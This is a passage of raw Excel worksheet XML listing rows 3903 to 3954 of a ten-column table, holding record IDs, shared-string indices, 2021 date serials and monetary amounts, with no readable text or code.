        <v>5309</v>
      </c>
      <c r="C3903" t="s">
        <v>8546</v>
      </c>
      <c r="D3903" t="s">
        <v>13153</v>
      </c>
      <c r="E3903">
        <v>33</v>
      </c>
      <c r="F3903" t="s">
        <v>10095</v>
      </c>
      <c r="G3903" s="1">
        <v>44281</v>
      </c>
      <c r="H3903">
        <v>100000</v>
      </c>
      <c r="I3903" t="s">
        <v>9693</v>
      </c>
      <c r="J3903" t="s">
        <v>13154</v>
      </c>
    </row>
    <row r="3904" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3904">
        <v>24202</v>
      </c>
      <c r="B3904">
        <v>5309</v>
      </c>
      <c r="C3904" t="s">
        <v>8546</v>
      </c>
      <c r="D3904" t="s">
        <v>13153</v>
      </c>
      <c r="E3904">
        <v>33</v>
      </c>
      <c r="F3904" t="s">
        <v>13155</v>
      </c>
      <c r="G3904" s="1">
        <v>44281</v>
      </c>
      <c r="H3904">
        <v>50000</v>
      </c>
      <c r="I3904" t="s">
        <v>9693</v>
      </c>
      <c r="J3904" t="s">
        <v>13154</v>
      </c>
    </row>
    <row r="3905" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3905">
        <v>24203</v>
      </c>
      <c r="B3905">
        <v>5309</v>
      </c>
      <c r="C3905" t="s">
        <v>8546</v>
      </c>
      <c r="D3905" t="s">
        <v>13153</v>
      </c>
      <c r="E3905">
        <v>33</v>
      </c>
      <c r="F3905" t="s">
        <v>3763</v>
      </c>
      <c r="G3905" s="1">
        <v>44281</v>
      </c>
      <c r="H3905">
        <v>50000</v>
      </c>
      <c r="I3905" t="s">
        <v>10642</v>
      </c>
      <c r="J3905" t="s">
        <v>13154</v>
      </c>
    </row>
    <row r="3906" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3906">
        <v>24204</v>
      </c>
      <c r="B3906">
        <v>5309</v>
      </c>
      <c r="C3906" t="s">
        <v>8546</v>
      </c>
      <c r="D3906" t="s">
        <v>13153</v>
      </c>
      <c r="E3906">
        <v>33</v>
      </c>
      <c r="F3906" t="s">
        <v>2236</v>
      </c>
      <c r="G3906" s="1">
        <v>44281</v>
      </c>
      <c r="H3906">
        <v>50000</v>
      </c>
      <c r="I3906" t="s">
        <v>10642</v>
      </c>
      <c r="J3906" t="s">
        <v>13154</v>
      </c>
    </row>
    <row r="3907" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3907">
        <v>24205</v>
      </c>
      <c r="B3907">
        <v>5309</v>
      </c>
      <c r="C3907" t="s">
        <v>8546</v>
      </c>
      <c r="D3907" t="s">
        <v>13153</v>
      </c>
      <c r="E3907">
        <v>33</v>
      </c>
      <c r="F3907" t="s">
        <v>1746</v>
      </c>
      <c r="G3907" s="1">
        <v>44281</v>
      </c>
      <c r="H3907">
        <v>100000</v>
      </c>
      <c r="I3907" t="s">
        <v>9693</v>
      </c>
      <c r="J3907" t="s">
        <v>13154</v>
      </c>
    </row>
    <row r="3908" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3908">
        <v>24206</v>
      </c>
      <c r="B3908">
        <v>5309</v>
      </c>
      <c r="C3908" t="s">
        <v>8546</v>
      </c>
      <c r="D3908" t="s">
        <v>13153</v>
      </c>
      <c r="E3908">
        <v>33</v>
      </c>
      <c r="F3908" t="s">
        <v>9586</v>
      </c>
      <c r="G3908" s="1">
        <v>44281</v>
      </c>
      <c r="H3908">
        <v>100000</v>
      </c>
      <c r="I3908" t="s">
        <v>9693</v>
      </c>
      <c r="J3908" t="s">
        <v>13154</v>
      </c>
    </row>
    <row r="3909" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3909">
        <v>24207</v>
      </c>
      <c r="B3909">
        <v>5309</v>
      </c>
      <c r="C3909" t="s">
        <v>8546</v>
      </c>
      <c r="D3909" t="s">
        <v>13153</v>
      </c>
      <c r="E3909">
        <v>33</v>
      </c>
      <c r="F3909" t="s">
        <v>9437</v>
      </c>
      <c r="G3909" s="1">
        <v>44281</v>
      </c>
      <c r="H3909">
        <v>50000</v>
      </c>
      <c r="I3909" t="s">
        <v>9693</v>
      </c>
      <c r="J3909" t="s">
        <v>13154</v>
      </c>
    </row>
    <row r="3910" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3910">
        <v>24208</v>
      </c>
      <c r="B3910">
        <v>5307</v>
      </c>
      <c r="C3910" t="s">
        <v>2417</v>
      </c>
      <c r="D3910" t="s">
        <v>13156</v>
      </c>
      <c r="E3910">
        <v>11</v>
      </c>
      <c r="F3910" t="s">
        <v>385</v>
      </c>
      <c r="G3910" s="1">
        <v>44284</v>
      </c>
      <c r="H3910">
        <v>500000</v>
      </c>
      <c r="J3910" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3911" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3911">
        <v>24212</v>
      </c>
      <c r="B3911">
        <v>1668</v>
      </c>
      <c r="C3911" t="s">
        <v>4290</v>
      </c>
      <c r="D3911" t="s">
        <v>13157</v>
      </c>
      <c r="E3911">
        <v>26</v>
      </c>
      <c r="F3911" t="s">
        <v>385</v>
      </c>
      <c r="G3911" s="1">
        <v>44271</v>
      </c>
      <c r="H3911">
        <v>374400</v>
      </c>
      <c r="J3911" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3912" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3912">
        <v>24218</v>
      </c>
      <c r="B3912">
        <v>306</v>
      </c>
      <c r="C3912" t="s">
        <v>119</v>
      </c>
      <c r="D3912" t="s">
        <v>13158</v>
      </c>
      <c r="E3912">
        <v>14</v>
      </c>
      <c r="F3912" t="s">
        <v>12465</v>
      </c>
      <c r="G3912" s="1">
        <v>44313</v>
      </c>
      <c r="H3912">
        <v>82757</v>
      </c>
      <c r="J3912" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3913" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3913">
        <v>24219</v>
      </c>
      <c r="B3913">
        <v>306</v>
      </c>
      <c r="C3913" t="s">
        <v>119</v>
      </c>
      <c r="D3913" t="s">
        <v>13158</v>
      </c>
      <c r="E3913">
        <v>14</v>
      </c>
      <c r="F3913" t="s">
        <v>9670</v>
      </c>
      <c r="G3913" s="1">
        <v>44313</v>
      </c>
      <c r="H3913">
        <v>946653</v>
      </c>
      <c r="J3913" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3914" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3914">
        <v>24220</v>
      </c>
      <c r="B3914">
        <v>306</v>
      </c>
      <c r="C3914" t="s">
        <v>119</v>
      </c>
      <c r="D3914" t="s">
        <v>13158</v>
      </c>
      <c r="E3914">
        <v>14</v>
      </c>
      <c r="F3914" t="s">
        <v>13159</v>
      </c>
      <c r="G3914" s="1">
        <v>44313</v>
      </c>
      <c r="H3914">
        <v>25000</v>
      </c>
      <c r="J3914" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3915" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3915">
        <v>24221</v>
      </c>
      <c r="B3915">
        <v>306</v>
      </c>
      <c r="C3915" t="s">
        <v>119</v>
      </c>
      <c r="D3915" t="s">
        <v>13158</v>
      </c>
      <c r="E3915">
        <v>14</v>
      </c>
      <c r="F3915" t="s">
        <v>9561</v>
      </c>
      <c r="G3915" s="1">
        <v>44313</v>
      </c>
      <c r="H3915">
        <v>5828</v>
      </c>
      <c r="J3915" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3916" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3916">
        <v>24222</v>
      </c>
      <c r="B3916">
        <v>306</v>
      </c>
      <c r="C3916" t="s">
        <v>119</v>
      </c>
      <c r="D3916" t="s">
        <v>13158</v>
      </c>
      <c r="E3916">
        <v>14</v>
      </c>
      <c r="F3916" t="s">
        <v>9502</v>
      </c>
      <c r="G3916" s="1">
        <v>44313</v>
      </c>
      <c r="H3916">
        <v>40109</v>
      </c>
      <c r="J3916" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3917" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3917">
        <v>24223</v>
      </c>
      <c r="B3917">
        <v>306</v>
      </c>
      <c r="C3917" t="s">
        <v>119</v>
      </c>
      <c r="D3917" t="s">
        <v>13158</v>
      </c>
      <c r="E3917">
        <v>14</v>
      </c>
      <c r="F3917" t="s">
        <v>1746</v>
      </c>
      <c r="G3917" s="1">
        <v>44313</v>
      </c>
      <c r="H3917">
        <v>11880</v>
      </c>
      <c r="J3917" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3918" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3918">
        <v>24224</v>
      </c>
      <c r="B3918">
        <v>306</v>
      </c>
      <c r="C3918" t="s">
        <v>119</v>
      </c>
      <c r="D3918" t="s">
        <v>13158</v>
      </c>
      <c r="E3918">
        <v>14</v>
      </c>
      <c r="F3918" t="s">
        <v>2236</v>
      </c>
      <c r="G3918" s="1">
        <v>44313</v>
      </c>
      <c r="H3918">
        <v>225500</v>
      </c>
      <c r="J3918" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3919" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3919">
        <v>24225</v>
      </c>
      <c r="B3919">
        <v>306</v>
      </c>
      <c r="C3919" t="s">
        <v>119</v>
      </c>
      <c r="D3919" t="s">
        <v>13158</v>
      </c>
      <c r="E3919">
        <v>14</v>
      </c>
      <c r="F3919" t="s">
        <v>13160</v>
      </c>
      <c r="G3919" s="1">
        <v>44320</v>
      </c>
      <c r="H3919">
        <v>3830</v>
      </c>
      <c r="J3919" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3920" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3920">
        <v>24226</v>
      </c>
      <c r="B3920">
        <v>1746</v>
      </c>
      <c r="C3920" t="s">
        <v>6431</v>
      </c>
      <c r="D3920" t="s">
        <v>13161</v>
      </c>
      <c r="E3920">
        <v>16</v>
      </c>
      <c r="F3920" t="s">
        <v>3242</v>
      </c>
      <c r="G3920" s="1">
        <v>44343</v>
      </c>
      <c r="H3920">
        <v>150000</v>
      </c>
      <c r="I3920" t="s">
        <v>13162</v>
      </c>
      <c r="J3920" t="s">
        <v>12464</v>
      </c>
    </row>
    <row r="3921" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3921">
        <v>24227</v>
      </c>
      <c r="B3921">
        <v>1324</v>
      </c>
      <c r="C3921" t="s">
        <v>2466</v>
      </c>
      <c r="D3921" t="s">
        <v>13163</v>
      </c>
      <c r="E3921">
        <v>26</v>
      </c>
      <c r="F3921" t="s">
        <v>3204</v>
      </c>
      <c r="G3921" s="1">
        <v>44258</v>
      </c>
      <c r="H3921">
        <v>5000</v>
      </c>
      <c r="I3921" t="s">
        <v>9485</v>
      </c>
      <c r="J3921" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="3922" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3922">
        <v>24228</v>
      </c>
      <c r="B3922">
        <v>1324</v>
      </c>
      <c r="C3922" t="s">
        <v>2466</v>
      </c>
      <c r="D3922" t="s">
        <v>13163</v>
      </c>
      <c r="E3922">
        <v>26</v>
      </c>
      <c r="F3922" t="s">
        <v>9453</v>
      </c>
      <c r="G3922" s="1">
        <v>44258</v>
      </c>
      <c r="H3922">
        <v>5000</v>
      </c>
      <c r="I3922" t="s">
        <v>9485</v>
      </c>
      <c r="J3922" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="3923" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3923">
        <v>24229</v>
      </c>
      <c r="B3923">
        <v>1324</v>
      </c>
      <c r="C3923" t="s">
        <v>2466</v>
      </c>
      <c r="D3923" t="s">
        <v>13163</v>
      </c>
      <c r="E3923">
        <v>26</v>
      </c>
      <c r="F3923" t="s">
        <v>11554</v>
      </c>
      <c r="G3923" s="1">
        <v>44258</v>
      </c>
      <c r="H3923">
        <v>5000</v>
      </c>
      <c r="I3923" t="s">
        <v>9536</v>
      </c>
      <c r="J3923" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3924" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3924">
        <v>24230</v>
      </c>
      <c r="B3924">
        <v>1324</v>
      </c>
      <c r="C3924" t="s">
        <v>2466</v>
      </c>
      <c r="D3924" t="s">
        <v>13163</v>
      </c>
      <c r="E3924">
        <v>26</v>
      </c>
      <c r="F3924" t="s">
        <v>547</v>
      </c>
      <c r="G3924" s="1">
        <v>44258</v>
      </c>
      <c r="H3924">
        <v>5000</v>
      </c>
      <c r="I3924" t="s">
        <v>9485</v>
      </c>
      <c r="J3924" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="3925" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3925">
        <v>24231</v>
      </c>
      <c r="B3925">
        <v>1324</v>
      </c>
      <c r="C3925" t="s">
        <v>2466</v>
      </c>
      <c r="D3925" t="s">
        <v>13163</v>
      </c>
      <c r="E3925">
        <v>26</v>
      </c>
      <c r="F3925" t="s">
        <v>9846</v>
      </c>
      <c r="G3925" s="1">
        <v>44258</v>
      </c>
      <c r="H3925">
        <v>5000</v>
      </c>
      <c r="I3925" t="s">
        <v>9485</v>
      </c>
      <c r="J3925" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="3926" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3926">
        <v>24232</v>
      </c>
      <c r="B3926">
        <v>950</v>
      </c>
      <c r="C3926" t="s">
        <v>4227</v>
      </c>
      <c r="D3926" t="s">
        <v>13164</v>
      </c>
      <c r="E3926">
        <v>17</v>
      </c>
      <c r="F3926" t="s">
        <v>13165</v>
      </c>
      <c r="G3926" s="1">
        <v>44253</v>
      </c>
      <c r="H3926">
        <v>50000</v>
      </c>
      <c r="J3926" t="s">
        <v>13166</v>
      </c>
    </row>
    <row r="3927" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3927">
        <v>24233</v>
      </c>
      <c r="B3927">
        <v>950</v>
      </c>
      <c r="C3927" t="s">
        <v>4227</v>
      </c>
      <c r="D3927" t="s">
        <v>13164</v>
      </c>
      <c r="E3927">
        <v>17</v>
      </c>
      <c r="F3927" t="s">
        <v>13167</v>
      </c>
      <c r="G3927" s="1">
        <v>44253</v>
      </c>
      <c r="H3927">
        <v>50000</v>
      </c>
      <c r="J3927" t="s">
        <v>10326</v>
      </c>
    </row>
    <row r="3928" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3928">
        <v>24234</v>
      </c>
      <c r="B3928">
        <v>950</v>
      </c>
      <c r="C3928" t="s">
        <v>4227</v>
      </c>
      <c r="D3928" t="s">
        <v>13164</v>
      </c>
      <c r="E3928">
        <v>17</v>
      </c>
      <c r="F3928" t="s">
        <v>13168</v>
      </c>
      <c r="G3928" s="1">
        <v>44253</v>
      </c>
      <c r="H3928">
        <v>50000</v>
      </c>
      <c r="J3928" t="s">
        <v>13166</v>
      </c>
    </row>
    <row r="3929" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3929">
        <v>24235</v>
      </c>
      <c r="B3929">
        <v>950</v>
      </c>
      <c r="C3929" t="s">
        <v>4227</v>
      </c>
      <c r="D3929" t="s">
        <v>13164</v>
      </c>
      <c r="E3929">
        <v>17</v>
      </c>
      <c r="F3929" t="s">
        <v>13169</v>
      </c>
      <c r="G3929" s="1">
        <v>44253</v>
      </c>
      <c r="H3929">
        <v>80000</v>
      </c>
      <c r="J3929" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3930" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3930">
        <v>24236</v>
      </c>
      <c r="B3930">
        <v>950</v>
      </c>
      <c r="C3930" t="s">
        <v>4227</v>
      </c>
      <c r="D3930" t="s">
        <v>13164</v>
      </c>
      <c r="E3930">
        <v>17</v>
      </c>
      <c r="F3930" t="s">
        <v>2236</v>
      </c>
      <c r="G3930" s="1">
        <v>44253</v>
      </c>
      <c r="H3930">
        <v>200000</v>
      </c>
      <c r="J3930" t="s">
        <v>10326</v>
      </c>
    </row>
    <row r="3931" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3931">
        <v>24237</v>
      </c>
      <c r="B3931">
        <v>950</v>
      </c>
      <c r="C3931" t="s">
        <v>4227</v>
      </c>
      <c r="D3931" t="s">
        <v>13164</v>
      </c>
      <c r="E3931">
        <v>17</v>
      </c>
      <c r="F3931" t="s">
        <v>4686</v>
      </c>
      <c r="G3931" s="1">
        <v>44253</v>
      </c>
      <c r="H3931">
        <v>50000</v>
      </c>
      <c r="J3931" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3932" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3932">
        <v>24238</v>
      </c>
      <c r="B3932">
        <v>950</v>
      </c>
      <c r="C3932" t="s">
        <v>4227</v>
      </c>
      <c r="D3932" t="s">
        <v>13164</v>
      </c>
      <c r="E3932">
        <v>17</v>
      </c>
      <c r="F3932" t="s">
        <v>9437</v>
      </c>
      <c r="G3932" s="1">
        <v>44253</v>
      </c>
      <c r="H3932">
        <v>100000</v>
      </c>
      <c r="J3932" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="3933" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3933">
        <v>24239</v>
      </c>
      <c r="B3933">
        <v>950</v>
      </c>
      <c r="C3933" t="s">
        <v>4227</v>
      </c>
      <c r="D3933" t="s">
        <v>13164</v>
      </c>
      <c r="E3933">
        <v>17</v>
      </c>
      <c r="F3933" t="s">
        <v>10651</v>
      </c>
      <c r="G3933" s="1">
        <v>44253</v>
      </c>
      <c r="H3933">
        <v>80000</v>
      </c>
      <c r="J3933" t="s">
        <v>13166</v>
      </c>
    </row>
    <row r="3934" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3934">
        <v>24241</v>
      </c>
      <c r="B3934">
        <v>1199</v>
      </c>
      <c r="C3934" t="s">
        <v>3708</v>
      </c>
      <c r="D3934" t="s">
        <v>12586</v>
      </c>
      <c r="E3934">
        <v>12</v>
      </c>
      <c r="F3934" t="s">
        <v>9925</v>
      </c>
      <c r="G3934" s="1">
        <v>44237</v>
      </c>
      <c r="H3934">
        <v>0</v>
      </c>
      <c r="J3934" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3935" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3935">
        <v>24246</v>
      </c>
      <c r="B3935">
        <v>4901</v>
      </c>
      <c r="C3935" t="s">
        <v>16510</v>
      </c>
      <c r="D3935" t="s">
        <v>16511</v>
      </c>
      <c r="E3935">
        <v>2</v>
      </c>
      <c r="F3935" t="s">
        <v>13170</v>
      </c>
      <c r="G3935" s="1">
        <v>44236</v>
      </c>
      <c r="H3935" s="4">
        <v>100000</v>
      </c>
      <c r="I3935" t="s">
        <v>13171</v>
      </c>
      <c r="J3935" t="s">
        <v>12920</v>
      </c>
    </row>
    <row r="3936" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3936">
        <v>24248</v>
      </c>
      <c r="B3936">
        <v>1655</v>
      </c>
      <c r="C3936" t="s">
        <v>4327</v>
      </c>
      <c r="D3936" t="s">
        <v>13172</v>
      </c>
      <c r="E3936">
        <v>17</v>
      </c>
      <c r="F3936" t="s">
        <v>1651</v>
      </c>
      <c r="G3936" s="1">
        <v>44272</v>
      </c>
      <c r="H3936">
        <v>3586000</v>
      </c>
      <c r="I3936" t="s">
        <v>13173</v>
      </c>
      <c r="J3936" t="s">
        <v>10469</v>
      </c>
    </row>
    <row r="3937" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3937">
        <v>24249</v>
      </c>
      <c r="B3937">
        <v>229</v>
      </c>
      <c r="C3937" t="s">
        <v>1282</v>
      </c>
      <c r="D3937" t="s">
        <v>13174</v>
      </c>
      <c r="E3937">
        <v>16</v>
      </c>
      <c r="F3937" t="s">
        <v>13175</v>
      </c>
      <c r="G3937" s="1">
        <v>44263</v>
      </c>
      <c r="H3937">
        <v>60000</v>
      </c>
      <c r="J3937" t="s">
        <v>13176</v>
      </c>
    </row>
    <row r="3938" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3938">
        <v>24250</v>
      </c>
      <c r="B3938">
        <v>1675</v>
      </c>
      <c r="C3938" t="s">
        <v>16521</v>
      </c>
      <c r="D3938" t="s">
        <v>16522</v>
      </c>
      <c r="E3938">
        <v>29</v>
      </c>
      <c r="F3938" t="s">
        <v>13177</v>
      </c>
      <c r="G3938" s="1">
        <v>44287</v>
      </c>
      <c r="H3938" s="4">
        <v>5500000</v>
      </c>
      <c r="I3938" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3939" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3939">
        <v>24251</v>
      </c>
      <c r="B3939">
        <v>1675</v>
      </c>
      <c r="C3939" t="s">
        <v>16521</v>
      </c>
      <c r="D3939" t="s">
        <v>16522</v>
      </c>
      <c r="E3939">
        <v>29</v>
      </c>
      <c r="F3939" t="s">
        <v>13178</v>
      </c>
      <c r="G3939" s="1">
        <v>44287</v>
      </c>
      <c r="H3939" s="4">
        <v>5500000</v>
      </c>
      <c r="I3939" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3940" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3940">
        <v>24252</v>
      </c>
      <c r="B3940">
        <v>1543</v>
      </c>
      <c r="C3940" t="s">
        <v>4320</v>
      </c>
      <c r="D3940" t="s">
        <v>13179</v>
      </c>
      <c r="E3940">
        <v>26</v>
      </c>
      <c r="F3940" t="s">
        <v>13180</v>
      </c>
      <c r="G3940" s="1">
        <v>44273</v>
      </c>
      <c r="H3940">
        <v>118000</v>
      </c>
      <c r="I3940" t="s">
        <v>9550</v>
      </c>
      <c r="J3940" t="s">
        <v>13181</v>
      </c>
    </row>
    <row r="3941" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3941">
        <v>24253</v>
      </c>
      <c r="B3941">
        <v>1543</v>
      </c>
      <c r="C3941" t="s">
        <v>4320</v>
      </c>
      <c r="D3941" t="s">
        <v>13179</v>
      </c>
      <c r="E3941">
        <v>26</v>
      </c>
      <c r="F3941" t="s">
        <v>9470</v>
      </c>
      <c r="G3941" s="1">
        <v>44273</v>
      </c>
      <c r="H3941">
        <v>2700</v>
      </c>
      <c r="I3941" t="s">
        <v>9550</v>
      </c>
      <c r="J3941" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3942" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3942">
        <v>24254</v>
      </c>
      <c r="B3942">
        <v>1543</v>
      </c>
      <c r="C3942" t="s">
        <v>4320</v>
      </c>
      <c r="D3942" t="s">
        <v>13179</v>
      </c>
      <c r="E3942">
        <v>26</v>
      </c>
      <c r="F3942" t="s">
        <v>9437</v>
      </c>
      <c r="G3942" s="1">
        <v>44273</v>
      </c>
      <c r="H3942">
        <v>80000</v>
      </c>
      <c r="I3942" t="s">
        <v>9550</v>
      </c>
      <c r="J3942" t="s">
        <v>13182</v>
      </c>
    </row>
    <row r="3943" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3943">
        <v>24255</v>
      </c>
      <c r="B3943">
        <v>1543</v>
      </c>
      <c r="C3943" t="s">
        <v>4320</v>
      </c>
      <c r="D3943" t="s">
        <v>13179</v>
      </c>
      <c r="E3943">
        <v>26</v>
      </c>
      <c r="F3943" t="s">
        <v>2236</v>
      </c>
      <c r="G3943" s="1">
        <v>44273</v>
      </c>
      <c r="H3943">
        <v>96000</v>
      </c>
      <c r="I3943" t="s">
        <v>9550</v>
      </c>
      <c r="J3943" t="s">
        <v>13183</v>
      </c>
    </row>
    <row r="3944" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3944">
        <v>24256</v>
      </c>
      <c r="B3944">
        <v>1543</v>
      </c>
      <c r="C3944" t="s">
        <v>4320</v>
      </c>
      <c r="D3944" t="s">
        <v>13179</v>
      </c>
      <c r="E3944">
        <v>26</v>
      </c>
      <c r="F3944" t="s">
        <v>9681</v>
      </c>
      <c r="G3944" s="1">
        <v>44273</v>
      </c>
      <c r="H3944">
        <v>3500</v>
      </c>
      <c r="I3944" t="s">
        <v>9550</v>
      </c>
      <c r="J3944" t="s">
        <v>13184</v>
      </c>
    </row>
    <row r="3945" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3945">
        <v>24257</v>
      </c>
      <c r="B3945">
        <v>5301</v>
      </c>
      <c r="C3945" t="s">
        <v>8576</v>
      </c>
      <c r="D3945" t="s">
        <v>13185</v>
      </c>
      <c r="E3945">
        <v>4</v>
      </c>
      <c r="F3945" t="s">
        <v>8578</v>
      </c>
      <c r="G3945" s="1">
        <v>44237</v>
      </c>
      <c r="H3945">
        <v>2160</v>
      </c>
      <c r="I3945" t="s">
        <v>13186</v>
      </c>
    </row>
    <row r="3946" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3946">
        <v>24259</v>
      </c>
      <c r="B3946">
        <v>1507</v>
      </c>
      <c r="C3946" t="s">
        <v>2937</v>
      </c>
      <c r="D3946" t="s">
        <v>12191</v>
      </c>
      <c r="E3946">
        <v>12</v>
      </c>
      <c r="F3946" t="s">
        <v>2924</v>
      </c>
      <c r="G3946" s="1">
        <v>44336</v>
      </c>
      <c r="H3946">
        <v>0</v>
      </c>
      <c r="I3946" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="3947" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3947">
        <v>24260</v>
      </c>
      <c r="B3947">
        <v>5325</v>
      </c>
      <c r="C3947" t="s">
        <v>8591</v>
      </c>
      <c r="D3947" t="s">
        <v>12165</v>
      </c>
      <c r="E3947">
        <v>16</v>
      </c>
      <c r="F3947" t="s">
        <v>13187</v>
      </c>
      <c r="G3947" s="1">
        <v>44294</v>
      </c>
      <c r="H3947">
        <v>5000000</v>
      </c>
      <c r="I3947" t="s">
        <v>13188</v>
      </c>
    </row>
    <row r="3948" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3948">
        <v>24261</v>
      </c>
      <c r="B3948">
        <v>5325</v>
      </c>
      <c r="C3948" t="s">
        <v>8591</v>
      </c>
      <c r="D3948" t="s">
        <v>12165</v>
      </c>
      <c r="E3948">
        <v>16</v>
      </c>
      <c r="F3948" t="s">
        <v>10127</v>
      </c>
      <c r="G3948" s="1">
        <v>44294</v>
      </c>
      <c r="H3948">
        <v>100000</v>
      </c>
      <c r="I3948" t="s">
        <v>13188</v>
      </c>
    </row>
    <row r="3949" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3949">
        <v>24262</v>
      </c>
      <c r="B3949">
        <v>5325</v>
      </c>
      <c r="C3949" t="s">
        <v>8591</v>
      </c>
      <c r="D3949" t="s">
        <v>12165</v>
      </c>
      <c r="E3949">
        <v>16</v>
      </c>
      <c r="F3949" t="s">
        <v>2236</v>
      </c>
      <c r="G3949" s="1">
        <v>44294</v>
      </c>
      <c r="H3949">
        <v>200000</v>
      </c>
      <c r="I3949" t="s">
        <v>9550</v>
      </c>
      <c r="J3949" t="s">
        <v>10330</v>
      </c>
    </row>
    <row r="3950" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3950">
        <v>24263</v>
      </c>
      <c r="B3950">
        <v>5325</v>
      </c>
      <c r="C3950" t="s">
        <v>8591</v>
      </c>
      <c r="D3950" t="s">
        <v>12165</v>
      </c>
      <c r="E3950">
        <v>16</v>
      </c>
      <c r="F3950" t="s">
        <v>9469</v>
      </c>
      <c r="G3950" s="1">
        <v>44294</v>
      </c>
      <c r="H3950">
        <v>100000</v>
      </c>
      <c r="I3950" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3951" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3951">
        <v>24264</v>
      </c>
      <c r="B3951">
        <v>862</v>
      </c>
      <c r="C3951" t="s">
        <v>3051</v>
      </c>
      <c r="D3951" t="s">
        <v>10942</v>
      </c>
      <c r="E3951">
        <v>2</v>
      </c>
      <c r="F3951" t="s">
        <v>4508</v>
      </c>
      <c r="G3951" s="1">
        <v>44253</v>
      </c>
      <c r="H3951">
        <v>100000</v>
      </c>
      <c r="J3951" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="3952" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3952">
        <v>24265</v>
      </c>
      <c r="B3952">
        <v>862</v>
      </c>
      <c r="C3952" t="s">
        <v>3051</v>
      </c>
      <c r="D3952" t="s">
        <v>13189</v>
      </c>
      <c r="E3952">
        <v>2</v>
      </c>
      <c r="F3952" t="s">
        <v>9595</v>
      </c>
      <c r="G3952" s="1">
        <v>44253</v>
      </c>
      <c r="H3952">
        <v>10000</v>
      </c>
      <c r="J3952" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3953" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3953">
        <v>24266</v>
      </c>
      <c r="B3953">
        <v>862</v>
      </c>
      <c r="C3953" t="s">
        <v>3051</v>
      </c>
      <c r="D3953" t="s">
        <v>10942</v>
      </c>
      <c r="E3953">
        <v>2</v>
      </c>
      <c r="F3953" t="s">
        <v>9435</v>
      </c>
      <c r="G3953" s="1">
        <v>44253</v>
      </c>
      <c r="H3953">
        <v>10000</v>
      </c>
      <c r="J3953" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="3954" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3954">
        <v>24267</v>
      </c>
      <c r="B3954">
        <v>862</v>
      </c>
      <c r="C3954" t="s">
        <v>3051</v>
      </c>
      <c r="D3954" t="s">
        <v>10942</v>
      </c>
      <c r="E3954">
        <v>2</v>
      </c>
      <c r="F3954" t="s">
        <v>13190</v>
      </c>
